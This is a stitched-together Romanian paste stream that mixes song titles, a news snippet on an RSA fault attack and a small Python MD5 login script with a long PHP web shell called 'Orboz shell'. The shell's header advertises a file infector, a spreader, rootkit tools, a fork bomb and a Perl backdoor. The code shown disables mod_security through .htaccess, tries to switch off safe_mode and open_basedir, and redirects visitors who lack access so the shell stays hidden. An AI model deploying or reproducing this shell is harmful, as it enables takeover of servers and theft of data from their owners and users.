Gonzalez

Ini Kamoze - World-A-Music.mp3 -Gonzalez

Oricum Parazitii sunt pe primul loc si tot timpul au fost deasupra "mafiei" -Gonzalez

Eu acum am gasit. -Gonzalez

Trei camarazi - Erich Maria Remarque -Gonzalez

Criptarea RSA pe 1024 de biti, considerata cea mai sigura metoda de acest fel din lume, a fost sparta, anunta engadget.com De cand a fost descoperita, in 1977, algoritmul de criptare RSA pe 1024 de biti, a fost considerat cea mai sigura metoda de protejare a datelor , indiferent ca e vorba de folosirea programelor de calculator, a gadgeturilor sau a transmisiunilor de date, si se estima ca poate fi spart numai prin brute force, dar intr-o perioada de timp descurajanta pentru oricine ar fi incercat acest lucru: 1500 de ani. Trei cercetatori de la Universitatea din Michigan spun ca au reusit sa "pacaleasca" celebrul algoritm printr-o metoda "simpla": au variat tensiunea de alimentare a procesorului intr-un mod determinat, pentru a genera o singura eroare pe tactul de frecventa, ceea ce le-a permis sa citeasca modificari succesive de cate un bit ale cheii private, reusind astfel sa gaseasca parola. Nu incercati totusi asta acasa: pe langa calculatorul folosit pentru criptare, au mai avut nevoie, pentru procesarea si interpretarea datelor, de un cluster de 81 de calculatoare Pentium 4 si 104 ore de munca. Cercetatorii vor prezenta rezultatele studiului lor la conferinta "Design, Automation and Test", care se va desfasura in aceasta saptamana si recomanda ca, pana ce RSA va rezolva problema, sa fiti foarte atenti la sursa de alimentare!

Parazitii - Bem.mp3 -Gonzalez

800. -Gonzalez

#!/usr/bin/env python #Author: s3my0n #Base Idea: 1R3N1CU5 #Comment: If you feed invalid type of database, the program will break ^^ be nice import sys from hashlib import md5 class UserManagement(object): def __init__(self, pathtodb): self.pathtodb = pathtodb def readDatabase(self): try: self.fopen = open(self.pathtodb, 'r+') #tryes to open path except(IOError): print '\n [-] Could not open %s to read/write' % (self.pathtodb) sys.exit() pares = [i.strip() for i in self.fopen.readlines()] #stripping '\n' newline db = {} for i in pares: pare = i.split(':') #this returns [user, pass] out of 'user:pass' db[pare[0]] = pare[1] self.database = db def encryptPassword(self, text): #My nifty md5 hash maker m = md5() m.update(text) en_text = m.hexdigest() return en_text def userLogin(self, user, password): if self.database.has_key(user): if self.database[user] == self.encryptPassword(password): #encrypting password to md5 hash print '\n [+] Access Granted!' #and comparing it to the database's hash else: print '\n [-] Invalid password for %s' % (user) else: print '\n [-] Invalid username' def userRegister(self, user, password): if self.database.has_key(user): print '\n [-] User already exists' return towrite = '%s:%s\n' % (user, self.encryptPassword(password)) self.fopen.write(towrite) #writing 'user:pass' to database def about(): a = ''' ######################### # # # Author: s3my0n # # Idea: 1R3N1CU5 # # # # For Intern0t.net !!! # # # # Experiment and Learn # # # ######################### ''' return a def rules(): r = ''' 1: Register new user 2: Login with existing user 3: Exit the program ''' return r def register(): try: u = raw_input('\n Enter new username: ') p = raw_input('\n Enter new password: ') except (KeyboardInterrupt, IOError): print '\Going back to main menu' return mng.userRegister(u, p) #adding new user mng.readDatabase() #updates database def login(): try: u = raw_input('\n Username: ') p = raw_input('\n Password: ') except (KeyboardInterrupt, IOError): print '\n [*] Going back to main menu' return mng.userLogin(u, p) def main(): print rules() while True: try: command = raw_input('\nWhat would you like to do?: ').strip() except (IOError, KeyboardInterrupt): print '\n [*] See ya later aligator' sys.exit() if command in '123': if command == '1': register() if command == '2': login() if command == '3': print '\n [*] BYe..' sys.exit() else: print '\n [-] Invalid command' if __name__=='__main__': while True: try: path = raw_input('\nPlease specify path to user database: ') except (KeyboardInterrupt, IOError): print '\n [*] Aborted' sys.exit() break global mng #this is so all functions can access UserManagement class mng = UserManagement(path) #on this assignment __init__ gets path as pathtodb mng.readDatabase() #reads database print about() main() #starting main function

Videoclipuri de la conferinta PyCon 2010 http://pycon.blip.tv/

<?php /* * Orboz shell .. R57 On steroids * Build: 4 * List of must-makes: * - TODO: More database support; -999% * - TODO: Spoofer Shit; not started * - TODO: Proxy POST Shit * - TODO: Rootkit shit * - TODO: New spread method * - TODO: Import WHMCS Tools; 10% * - TODO: Import vBulluten Tools * - TODO: Import phpBB Tools * - TODO: Search Tool * - TODO: locator * - TODO: Plugins * * Features: * - Shell Killer * - Server quick-info bar: * > Server IP * > Your IP * > Disk space * > Safe_mode Status * > Open_BaseDir Status * > Magic_Quotes Status * > Register globals Status * > System Type * > Server software * > Disabled functions * > ID * > Shell location * > PHP Version * > Check Remote includes * > Read /etc/passwd? * > MySQL Status * > cURL Status * > Check for Root * > /tmp writable? * > getcwd() writable? * - File listing with CHMOD, Rename, Move, Delete functions * - File Infector (Mini-Shell in PHP file) * - Bypassers: cURL, copy(), Perl, ioncube * - Bypassers for Windows: Com wscript.shell, Ffi WinExec * - Locator * - Port Scanner * - Search Files * - Rootkit Tools * - Spreader * - Fork Bomb that launches several methods * - PHP Eval * - Run Shell Script * - Crypt data with: MD5, SHA1, Crypt, CRC32, CRC16, Base64 Encode, Base64 decode, URL encode, URL decode, Bin2Hex, Hex2Bin, Dec2Hex, Hex2Dec, Blowfish, Standard DES, Extended DES, Apr1 md5, Shadow MD5 * - Database Functions: * > MySQL: * * Connect to server * * Manage a database * * Run Queries * * View important information; Table Count, etc * * Dump/Export Table and Database * * Create Tables * * List Proccess * - Backdoor functions: Perl Backdoor, Connect to, Rev3rse Krew BC; with automatic perl location setting * - Server Info; Processor Information, CPU Info, Memory Information * - PhpInfo; With in-the-making bypasser (for blocked phpinfo) * - Built-In Proxy * - Plugins that will allow to add other functions [incom] * * */ /* Defaults.. */ session_start(); @set_magic_quotes_runtime(false); /***********************************\ * Settings * \***********************************/ /* * ENABLE_PLUGINS * Change to true if you want to enabled plugins */ define("ENABLE_PLUGINS", true); /* * DEBUG_MODE * Change to true if you want to show errors */ define("DEBUG_MODE", false); /* * ignor0rzz * Ignore all false statments in checkups.. enabled normaly */ define("ignor0rzz", true); /* * ACCESS_TYPE * 0 = Regular Access * 1 = I.P. restricted (md5 format) * 2 = Hostname format (md5 format) * 3 = Username/Password Required (md5 format) */ define("ACCESS_TYPE", 0); /* * ACCESS_STRING -> THESE ARE ALWAYS MD5'D * If.. * 0 = Regular Access :: Dosen't matter what it is * 1 = I.P. restricted (md5 format) :: md5 your I.P (use ?md5=_YOUR_IP_) * 2 = Hostname format (md5 format) :: md5 your hostname (use ?md5=_hostname) * 3 = Username/Password Required (md5 format) :: md5 both username and password, put in format username:password (use ?md5a=_USERNAME_&md5b=_PASSWORD_) */ define("ACCESS_STRING", "14c4b06b824ec593239362517f538b29:5f4dcc3b5aa765d61d8327deb882cf99"); /* * END settings DO NOT edit anything else! */ define("V", 4); if(version_compare(phpversion(), "4.1.0") == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; } switch(ACCESS_TYPE) { case 3: if (!isset($_SERVER['PHP_AUTH_USER']) || (md5($_SERVER['PHP_AUTH_USER']) . ":" . md5($_SERVER['PHP_AUTH_PW']))!= ACCESS_STRING) { header('WWW-Authenticate: Basic realm="Passworded Area"'); header('HTTP/1.0 401 Unauthorized'); exit("<h1>401 Unauthorized</h1><p>Your login details are incorrect!</p>"); } break; case 2: /* Send them back a few dirs if there data is wrong.. this can confuse the user and make them lose where the shell is */ if(md5(gethostbyaddr($_SERVER['REMOTE_ADDR'])) != ACCESS_STRING) { header("HTTP/1.0 404 Not Found"); header("Location: ../../../../../../../"); exit(); } break; case 1: if(md5($_SERVER['REMOTE_ADDR']) != ACCESS_STRING) { header("HTTP/1.0 404 Not Found"); header("Location: ../../../../../../../"); exit(); } case 0: default: break; } /* * Plugin System * To use the plugin system, simply link it to the r00t plugin * spot. * * E.G * $plugin[1] = "http://www.example.com/plugin.name"; * * DO NOT EDIT THE FIRST ONE! ($plugin[0] = 0;) SIMPLY ADD * THEM UNDER! * */ /* DEFAULT DO NOT CHANGE THIS */ $plugins[0] = 0; /* * Name: Shell Updater * Desc: This will check for updates on the shell, it will * add a box to the top of the page if needed. * * TODO: Get an update server */ //$plugins[1] = "http://www.todo.com/updater.txt"; /* Few bypassers */ if(function_exists("ini_alter")) { ini_alter("safe_mode", "off"); ini_alter("open_basedir", "off"); } @chmod("./.htaccess", 0777); if(file_exists("./.htaccess") || is_writable("./.htaccess")) { $current_htaccess = file_get_contents("./.htaccess"); $fh = fopen("./.htaccess", "w"); fwrite($fh, " <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>"); fclose($fh); } $pagestart = microtime(); $curl_on = function_exists('curl_version'); $mssql_on = function_exists('mssql_connect'); $pg_on = function_exists('pg_connect'); $ora_on = function_exists('ocilogon'); $disable_functions = ini_get("disable_functions"); if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } else { $ip = $_SERVER['REMOTE_ADDR']; } $int_paths = array("mybb", "phpbb", "phpbb2", "bb", "vb", "vboard", "phpbb3", "forum", "forums", "board", "boards", "bb", "discuss"); $config_files = array("config.php", "configuration.php", "settings", "mysql", "vb", "vboard", "phpbb3", "forum", "forums", "board", "boards", "bb", "discuss"); $billing_paths = array("whmcs", "cart", "shop", "billing", "", "payments", "bpay", "payway"); if($disable_functions == "") { $disable_functions = "None"; } if(is_dir("/home/") && is_writable("/home/")) { $home_readable = true; } else { $home_readable = false; } if(is_dir("/root/") && is_writable("/root/")) { $your_root = true; } else { /* * check windows */ if(is_dir("C:/Windows/") && is_writable("C:/Windows/")) { $your_root = true; } else { $your_root = false; } } if(is_dir("/tmp/") && is_writable("/tmp/")) { $tmp_readable = true; } else { $tmp_readable = false; } if(isset($_GET['md5'])) { echo("<h1>Quick MD5 Results</h1>"); if($_GET['md5'] == "_hostname") { echo("Hostname md5'd<br />" . md5(gethostbyaddr($_SERVER['REMOTE_ADDR']))); } else { echo(md5($_GET['md5'])); } exit(); } if(isset($_GET['md5a']) || isset($_GET['md5b'])) { echo("<h1>Quick MD5 Results</h1>"); echo(md5($_GET['md5a']) . ":" . md5($_GET['md5b'])); exit(); } _loadplugins(); if(isset($_GET['go']) && $_GET['go'] == "proxyx") { $_config = array ( 'url_var_name' => 'q', 'flags_var_name' => 'hl', 'get_form_name' => '____pgfa', 'basic_auth_var_name' => '____pbavn', 'max_file_size' => -1, 'allow_hotlinking' => 0, 'upon_hotlink' => 1, 'compress_output' => 0 ); $_flags = array ( 'include_form' => 1, 'remove_scripts' => 0, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 0, 'rotate13' => 1, 'base64_encode' => 1, 'strip_meta' => 1, 'strip_title' => 0, 'session_cookies' => 1 ); $_frozen_flags = array ( 'include_form' => 0, 'remove_scripts' => 0, 'accept_cookies' => 0, 'show_images' => 0, 'show_referer' => 0, 'rotate13' => 0, 'base64_encode' => 0, 'strip_meta' => 0, 'strip_title' => 0, 'session_cookies' => 0 ); $_labels = array ( 'include_form' => array('Include Form', 'Include mini URL-form on every page'), 'remove_scripts' => array('Remove Scripts', 'Remove client-side scripting (i.e JavaScript)'), 'accept_cookies' => array('Accept Cookies', 'Allow cookies to be stored'), 'show_images' => array('Show Images', 'Show images on browsed pages'), 'show_referer' => array('Show Referer', 'Show actual referring Website'), 'rotate13' => array('Rotate13', 'Use ROT13 encoding on the address'), 'base64_encode' => array('Base64', 'Use base64 encodng on the address'), 'strip_meta' => array('Strip Meta', 'Strip meta information tags from pages'), 'strip_title' => array('Strip Title', 'Strip page title'), 'session_cookies' => array('Session Cookies', 'Store cookies for this session only') ); $_hosts = array ( '#^127\.|192\.168\.|10\.|172\.(1[6-9]|2[0-9]|3[01])\.|67.43.227.231|rev3rse.org|www.rev3rse.org#i' ); $_hotlink_domains = array(); $_insert = array(); $_iflags = ''; $_system = array ( 'ssl' => extension_loaded('openssl') && version_compare(PHP_VERSION, '4.3.0', '>='), 'uploads' => ini_get('file_uploads'), 'gzip' => extension_loaded('zlib') && !ini_get('zlib.output_compression'), 'stripslashes' => get_magic_quotes_gpc() ); $_proxify = array('text/html' => 1, 'application/xml+xhtml' => 1, 'application/xhtml+xml' => 1, 'text/css' => 1); $_version = '0.5b2'; $_http_host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : (isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : 'localhost'); $_script_url = 'http' . ((isset($_ENV['HTTPS']) && $_ENV['HTTPS'] == 'on') || $_SERVER['SERVER_PORT'] == 443 ? 's' : '') . '://' . $_http_host . ($_SERVER['SERVER_PORT'] != 80 && $_SERVER['SERVER_PORT'] != 443 ? ':' . $_SERVER['SERVER_PORT'] : '') . $_SERVER['PHP_SELF']; $_script_base = substr($_script_url, 0, strrpos($_script_url, '/')+1); $_url = ''; $_url_parts = array(); $_base = array(); $_socket = null; $_request_method = $_SERVER['REQUEST_METHOD']; $_request_headers = ''; $_cookie = ''; $_post_body = ''; $_response_headers = array(); $_response_keys = array(); $_http_version = ''; $_response_code = 0; $_content_type = 'text/html'; $_content_length = false; $_content_disp = ''; $_set_cookie = array(); $_retry = false; $_quit = false; $_basic_auth_header = ''; $_basic_auth_realm = ''; $_auth_creds = array(); $_response_body = ''; function show_report($data) { echo '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"> <head> <style type="text/css"> body, input { font-family: "Bitstream Vera Sans", Arial, Helvetica, sans-serif; color: #234; } a { color: #9B9C83; text-decoration:none; border-bottom: 0px; } a:hover { color: #0080FF; } #container { border: 0px; -moz-border-radius: 0px; margin: auto; padding: 0px; width: 700px; } #title { color: #CC6633; margin: 0; } ul#navigation, ul#form { list-style-type: none; padding: 0; margin: 0; } ul#navigation { float: right; } ul#form { clear: both; } ul#navigation li { float: left; margin: 0; padding: 5px 0; border-top: 2px #BFAA9B solid; } ul#navigation li a { font-weight: bold; color: #ffffff; background-color: #AA8E79; padding: 5px 15px; margin-left: 1px; text-decoration: none; border-bottom: 0 #ffffff solid; } ul#navigation li a:hover { color: #44352C; } ul#form li { width: 700px; } #footer { color: #9B9C83; font-size: small; text-align: right; } #address_bar { border-top: 2px #BFAA9B solid; border-bottom: 3px #44352C solid; background-color: #AA8E79; text-align: center; padding: 5px 0; color: #ffffff; } #go { background-color: #ffffff; font-weight: bold; color: #AA8E79; border: 0 #ffffff solid; padding: 2px 5px; } #address_box { width: 500px; } .option { padding: 2px 0; background-color: #EEEBEA; } .option label { border-bottom: 2px #ffffff solid; } form { margin: 0; } #error, #auth { background-color: #BF6464; border-top: 1px solid #44352C; border-bottom: 1px solid #44352C; width: 700px; clear: both; } #auth { background-color: #94C261; } #error p, #auth p, #auth form { margin: 5px; } </style> </head> <body onload="document.getElementById(\'address_box\').focus()"> <div id="container"> <h1><font color="white">r00t-access Shell Proxy</font></h1>'; switch ($data['category']) { case 'auth': echo '<div id="auth"><p> <b>Enter your username and password for "' . htmlspecialchars($data['realm']) . '" on ' . $GLOBALS['_url_parts']['host'] . '</b> <form method="post" action="?go=proxyx"> <input type="hidden" name="' . $GLOBALS['_config']['basic_auth_var_name'] . ' " value="' . base64_encode($data['realm']) . '" /> <label>Username <input type="text" name="username" value="" /></label> <label>Password <input type="password" name="password" value="" /></label> <input type="submit" value="Login" /> </form></p></div>'; break; case 'error': echo '<div id="error"><p>'; switch ($data['group']) { case 'url': echo '<b>URL Error (' . $data['error'] . ')</b>: '; switch ($data['type']) { case 'internal': $message = 'Failed to connect to the specified host. ' . 'Possible problems are that the server was not found, the connection timed out, or the connection refused by the host. ' . 'Try connecting again and check if the address is correct.'; break; case 'external': switch ($data['error']) { case 1: $message = 'The URL you\'re attempting to access is blacklisted by this server. Please select another URL.'; break; case 2: $message = 'The URL you entered is malformed. Please check whether you entered the correct URL or not.'; break; } break; } break; case 'resource': echo '<b>Resource Error:</b> '; switch ($data['type']) { case 'file_size': $message = 'The file your are attempting to download is too large.<br />' . 'Maxiumum permissible file size is <b>' . number_format($GLOBALS['_config']['max_file_size']/1048576, 2) . ' MB</b><br />' . 'Requested file size is <b>' . number_format($GLOBALS['_content_length']/1048576, 2) . ' MB</b>'; break; case 'hotlinking': $message = 'It appears that you are trying to access a resource through this proxy from a remote Website.<br />' . 'For security reasons, please use the form below to do so.'; break; } break; } echo 'An error has occured while trying to browse through the proxy. <br />' . $message . '</p></div>'; break; } ?> <form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>?go=proxyx"> <ul id="form"> <li id="address_bar"><label>Web Address <input id="address_box" type="text" name="<?php echo $GLOBALS['_config']['url_var_name'] ?>" value="<?php echo isset($GLOBALS['_url']) ? htmlspecialchars($GLOBALS['_url']) : '' ?>" onfocus="this.select()" /></label> <input id="go" type="submit" value="Go" /></li> <?php foreach ($GLOBALS['_flags'] as $flag_name => $flag_value) { if (!$GLOBALS['_frozen_flags'][$flag_name]) { echo '<li class="option"><label><input type="checkbox" name="' . $GLOBALS['_config']['flags_var_name'] . '[' . $flag_name . ']"' . ($flag_value ? ' checked="checked"' : '') . ' />' . $GLOBALS['_labels'][$flag_name][1] . '</label></li>' . "\n"; } } ?> </ul> </form> </div> </body> </html> <?php exit(0); } function add_cookie($name, $value, $expires = 0) { return rawurlencode(rawurlencode($name)) . '=' . rawurlencode(rawurlencode($value)) . (empty($expires) ? '' : '; expires=' . gmdate('D, d-M-Y H:i:s \G\M\T', $expires)) . '; path=/; domain=.' . $GLOBALS['_http_host']; } function set_post_vars($array, $parent_key = null) { $temp = array(); foreach ($array as $key => $value) { $key = isset($parent_key) ? sprintf('%s[%s]', $parent_key, urlencode($key)) : urlencode($key); if (is_array($value)) { $temp = array_merge($temp, set_post_vars($value, $key)); } else { $temp[$key] = urlencode($value); } } return $temp; } function set_post_files($array, $parent_key = null) { $temp = array(); foreach ($array as $key => $value) { $key = isset($parent_key) ? sprintf('%s[%s]', $parent_key, urlencode($key)) : urlencode($key); if (is_array($value)) { $temp = array_merge_recursive($temp, set_post_files($value, $key)); } else if (preg_match('#^([^\[\]]+)\[(name|type|tmp_name)\]#', $key, $m)) { $temp[str_replace($m[0], $m[1], $key)][$m[2]] = $value; } } return $temp; } function url_parse($url, & $container) { $temp = @parse_url($url); if (!empty($temp)) { $temp['port_ext'] = ''; $temp['base'] = $temp['scheme'] . '://' . $temp['host']; if (isset($temp['port'])) { $temp['base'] .= $temp['port_ext'] = ':' . $temp['port']; } else { $temp['port'] = $temp['scheme'] === 'https' ? 443 : 80; } $temp['path'] = isset($temp['path']) ? $temp['path'] : '/'; $path = array(); $temp['path'] = explode('/', $temp['path']); foreach ($temp['path'] as $dir) { if ($dir === '..') { array_pop($path); } else if ($dir !== '.') { for ($dir = rawurldecode($dir), $new_dir = '', $i = 0, $count_i = strlen($dir); $i < $count_i; $new_dir .= strspn($dir{$i}, 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$-_.+!*\'(),?:@&;=') ? $dir{$i} : rawurlencode($dir{$i}), ++$i); $path[] = $new_dir; } } $temp['path'] = str_replace('/%7E', '/~', '/' . ltrim(implode('/', $path), '/')); $temp['file'] = substr($temp['path'], strrpos($temp['path'], '/')+1); $temp['dir'] = substr($temp['path'], 0, strrpos($temp['path'], '/')); $temp['base'] .= $temp['dir']; $temp['prev_dir'] = substr_count($temp['path'], '/') > 1 ? substr($temp['base'], 0, strrpos($temp['base'], '/')+1) : $temp['base'] . '/'; $container = $temp; return true; } return false; } function complete_url($url, $proxify = true) { $url = trim($url); if ($url === '') { return ''; } $hash_pos = strrpos($url, '#'); $fragment = $hash_pos !== false ? '#' . substr($url, $hash_pos) : ''; $sep_pos = strpos($url, '://'); if ($sep_pos === false || $sep_pos > 5) { switch ($url{0}) { case '/': $url = substr($url, 0, 2) === '//' ? $GLOBALS['_base']['scheme'] . ':' . $url : $GLOBALS['_base']['scheme'] . '://' . $GLOBALS['_base']['host'] . $GLOBALS['_base']['port_ext'] . $url; break; case '?': $url = $GLOBALS['_base']['base'] . '/' . $GLOBALS['_base']['file'] . $url; break; case '#': $proxify = false; break; case 'm': if (substr($url, 0, 7) == 'mailto:') { $proxify = false; break; } default: $url = $GLOBALS['_base']['base'] . '/' . $url; } } return $proxify ? "{$GLOBALS['_script_url']}?{$GLOBALS['_config']['url_var_name']}=" . encode_url($url) . $fragment . "&go=proxyx" : $url . "&go=proxyx"; } function proxify_inline_css($css) { preg_match_all('#url\s*\(\s*(([^)]*(\\\))*[^)]*)(\)|$)?#i', $css, $matches, PREG_SET_ORDER); for ($i = 0, $count = count($matches); $i < $count; ++$i) { $css = str_replace($matches[$i][0], 'url(' . proxify_css_url($matches[$i][1]) . "&go=proxyx" . ')', $css); } return $css; } function proxify_css($css) { $css = proxify_inline_css($css); preg_match_all("#@import\s*(?:\"([^\">]*)\"?|'([^'>]*)'?)([^;]*)(;|$)#i", $css, $matches, PREG_SET_ORDER); for ($i = 0, $count = count($matches); $i < $count; ++$i) { $delim = '"'; $url = $matches[$i][2]; if (isset($matches[$i][3])) { $delim = "'"; $url = $matches[$i][3]; } $css = str_replace($matches[$i][0], '@import ' . $delim . proxify_css_url($matches[$i][1]) . $delim . (isset($matches[$i][4]) ? $matches[$i][4] : ''), $css); } return $css; } function proxify_css_url($url) { $url = trim($url); $delim = strpos($url, '"') === 0 ? '"' : (strpos($url, "'") === 0 ? "'" : ''); return $delim . preg_replace('#([\(\),\s\'"\\\])#', '\\$1', complete_url(trim(preg_replace('#\\\(.)#', '$1', trim($url, $delim))))) . $delim; } if (isset($_POST[$_config['url_var_name']]) && !isset($_GET[$_config['url_var_name']]) && isset($_POST[$_config['flags_var_name']])) { foreach ($_flags as $flag_name => $flag_value) { $_iflags .= isset($_POST[$_config['flags_var_name']][$flag_name]) ? (string)(int)(bool)$_POST[$_config['flags_var_name']][$flag_name] : ($_frozen_flags[$flag_name] ? $flag_value : '0'); } $_iflags = base_convert(($_iflags != '' ? $_iflags : '0'), 2, 16); } else if (isset($_GET[$_config['flags_var_name']]) && !isset($_GET[$_config['get_form_name']]) && ctype_alnum($_GET[$_config['flags_var_name']])) { $_iflags = $_GET[$_config['flags_var_name']]; } else if (isset($_COOKIE['flags']) && ctype_alnum($_COOKIE['flags'])) { $_iflags = $_COOKIE['flags']; } if ($_iflags !== '') { $_set_cookie[] = add_cookie('flags', $_iflags, time()+2419200); $_iflags = str_pad(base_convert($_iflags, 16, 2), count($_flags), '0', STR_PAD_LEFT); $i = 0; foreach ($_flags as $flag_name => $flag_value) { $_flags[$flag_name] = $_frozen_flags[$flag_name] ? $flag_value : (int)(bool)$_iflags{$i}; $i++; } } if ($_flags['rotate13']) { function encode_url($url) { return rawurlencode(str_rot13($url)); } function decode_url($url) { return str_replace(array('&', '&'), '&', str_rot13(rawurldecode($url))); } } else if ($_flags['base64_encode']) { /* *Stop annoying errors in zend */ eval(" function encode_url(\$url) { return rawurlencode(base64_encode(\$url)); } function decode_url(\$url) { return str_replace(array('&', '&'), '&', base64_decode(rawurldecode(\$url))); }"); } else { eval(" function encode_url(\$url) { return rawurlencode(\$url); } function decode_url(\$url) { return str_replace(array('&', '&'), '&', rawurldecode(\$url)); }"); } if ($_config['compress_output'] && $_system['gzip']) { ob_start('ob_gzhandler'); } if ($_system['stripslashes']) { function _stripslashes($value) { return is_array($value) ? array_map('_stripslashes', $value) : (is_string($value) ? stripslashes($value) : $value); } $_GET = _stripslashes($_GET); $_POST = _stripslashes($_POST); $_COOKIE = _stripslashes($_COOKIE); } if (isset($_POST[$_config['url_var_name']]) && !isset($_GET[$_config['url_var_name']])) { header('Location: ' . $_script_url . '?' . $_config['url_var_name'] . '=' . encode_url($_POST[$_config['url_var_name']]) . '&' . $_config['flags_var_name'] . '=' . base_convert($_iflags, 2, 16) . "&go=proxyx"); exit(0); } if (isset($_GET[$_config['get_form_name']])) { $_url = decode_url($_GET[$_config['get_form_name']]); $qstr = strpos($_url, '?') !== false ? (strpos($_url, '?') === strlen($_url)-1 ? '' : '&') : '?'; $arr = explode('&', $_SERVER['QUERY_STRING']); if (preg_match('#^\Q' . $_config['get_form_name'] . '\E#', $arr[0])) { array_shift($arr); } $_url .= $qstr . implode('&', $arr); } else if (isset($_GET[$_config['url_var_name']])) { $_url = decode_url($_GET[$_config['url_var_name']]); } else if (isset($_GET['action']) && $_GET['action'] == 'cookies') { show_report(array('which' => 'cookies')); } else { show_report(array('which' => 'index', 'category' => 'entry_form')); } if (isset($_GET[$_config['url_var_name']], $_POST[$_config['basic_auth_var_name']], $_POST['username'], $_POST['password'])) { $_request_method = 'GET'; $_basic_auth_realm = base64_decode($_POST[$_config['basic_auth_var_name']]); $_basic_auth_header = base64_encode($_POST['username'] . ':' . $_POST['password']); } if (strpos($_url, '://') === false) { $_url = 'http://' . $_url; } if (url_parse($_url, $_url_parts)) { $_base = $_url_parts; if (!empty($_hosts)) { foreach ($_hosts as $host) { if (preg_match($host, $_url_parts['host'])) { show_report(array('which' => 'index', 'category' => 'error', 'group' => 'url', 'type' => 'external', 'error' => 1)); } } } } else { show_report(array('which' => 'index', 'category' => 'error', 'group' => 'url', 'type' => 'external', 'error' => 2)); } if (!$_config['allow_hotlinking'] && isset($_SERVER['HTTP_REFERER'])) { $_hotlink_domains[] = $_http_host; $is_hotlinking = true; foreach ($_hotlink_domains as $host) { if (preg_match('#^https?\:\/\/(www)?\Q' . $host . '\E(\/|\$)#i', trim($_SERVER['HTTP_REFERER']))) { $is_hotlinking = false; break; } } if ($is_hotlinking) { switch ($_config['upon_hotlink']) { case 1: show_report(array('which' => 'index', 'category' => 'error', 'group' => 'resource', 'type' => 'hotlinking')); break; case 2: header('HTTP/1.0 404 Not Found'); exit(0); default: header('Location: ' . $_config['upon_hotlink'] . "?go=proxyx"); exit(0); } } } do { $_retry = false; $_socket = @fsockopen(($_url_parts['scheme'] === 'https' && $_system['ssl'] ? 'ssl://' : 'tcp://') . $_url_parts['host'], $_url_parts['port'], $err_no, $err_str, 30); if ($_socket === false) { show_report(array('which' => 'index', 'category' => 'error', 'group' => 'url', 'type' => 'internal', 'error' => $err_no)); } $_request_headers = $_request_method . ' ' . $_url_parts['path']; if (isset($_url_parts['query'])) { $_request_headers .= '?'; $query = preg_split('#([&;])#', $_url_parts['query'], -1, PREG_SPLIT_DELIM_CAPTURE); for ($i = 0, $count = count($query); $i < $count; $_request_headers .= implode('=', array_map('urlencode', array_map('urldecode', explode('=', $query[$i])))) . (isset($query[++$i]) ? $query[$i] : ''), $i++); } $_request_headers .= " HTTP/1.0\r\n"; $_request_headers .= 'Host: ' . $_url_parts['host'] . $_url_parts['port_ext'] . "\r\n"; if (isset($_SERVER['HTTP_USER_AGENT'])) { $_request_headers .= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n"; } if (isset($_SERVER['HTTP_ACCEPT'])) { $_request_headers .= 'Accept: ' . $_SERVER['HTTP_ACCEPT'] . "\r\n"; } else { $_request_headers .= "Accept: */*;q=0.1\r\n"; } if ($_flags['show_referer'] && isset($_SERVER['HTTP_REFERER']) && preg_match('#^\Q' . $_script_url . '?' . $_config['url_var_name'] . '=\E([^&]+)#', $_SERVER['HTTP_REFERER'], $matches)) { $_request_headers .= 'Referer: ' . decode_url($matches[1]) . "\r\n"; } if (!empty($_COOKIE)) { $_cookie = ''; $_auth_creds = array(); foreach ($_COOKIE as $cookie_id => $cookie_content) { $cookie_id = explode(';', @rawurldecode($cookie_id)); $cookie_content = explode(';', @rawurldecode($cookie_content)); if ($cookie_id[0] === 'COOKIE') { $cookie_id[3] = str_replace('_', '.', $cookie_id[3]); if (count($cookie_id) < 4 || ($cookie_content[1] == 'secure' && $_url_parts['scheme'] != 'https')) { continue; } if ((preg_match('#\Q' . $cookie_id[3] . '\E$#i', $_url_parts['host']) || strtolower($cookie_id[3]) == strtolower('.' . $_url_parts['host'])) && preg_match('#^\Q' . $cookie_id[2] . '\E#', $_url_parts['path'])) { $_cookie .= ($_cookie != '' ? '; ' : '') . (empty($cookie_id[1]) ? '' : $cookie_id[1] . '=') . $cookie_content[0]; } } else if ($cookie_id[0] === 'AUTH' && count($cookie_id) === 3) { $cookie_id[2] = str_replace('_', '.', $cookie_id[2]); if ($_url_parts['host'] . ':' . $_url_parts['port'] === $cookie_id[2]) { $_auth_creds[$cookie_id[1]] = $cookie_content[0]; } } } if ($_cookie != '') { $_request_headers .= "Cookie: $_cookie\r\n"; } } if (isset($_url_parts['user'], $_url_parts['pass'])) { $_basic_auth_header = base64_encode($_url_parts['user'] . ':' . $_url_parts['pass']); } if (!empty($_basic_auth_header)) { $_set_cookie[] = add_cookie("AUTH;{$_basic_auth_realm};{$_url_parts['host']}:{$_url_parts['port']}", $_basic_auth_header); $_request_headers .= "Authorization: Basic {$_basic_auth_header}\r\n"; } else if (!empty($_basic_auth_realm) && isset($_auth_creds[$_basic_auth_realm])) { $_request_headers .= "Authorization: Basic {$_auth_creds[$_basic_auth_realm]}\r\n"; } else if (list($_basic_auth_realm, $_basic_auth_header) = each($_auth_creds)) { $_request_headers .= "Authorization: Basic {$_basic_auth_header}\r\n"; } if ($_request_method == 'POST') { if (!empty($_FILES) && $_system['uploads']) { $_data_boundary = '----' . md5(uniqid(rand(), true)); $array = set_post_vars($_POST); foreach ($array as $key => $value) { $_post_body .= "--{$_data_boundary}\r\n"; $_post_body .= "Content-Disposition: form-data; name=\"$key\"\r\n\r\n"; $_post_body .= urldecode($value) . "\r\n"; } $array = set_post_files($_FILES); 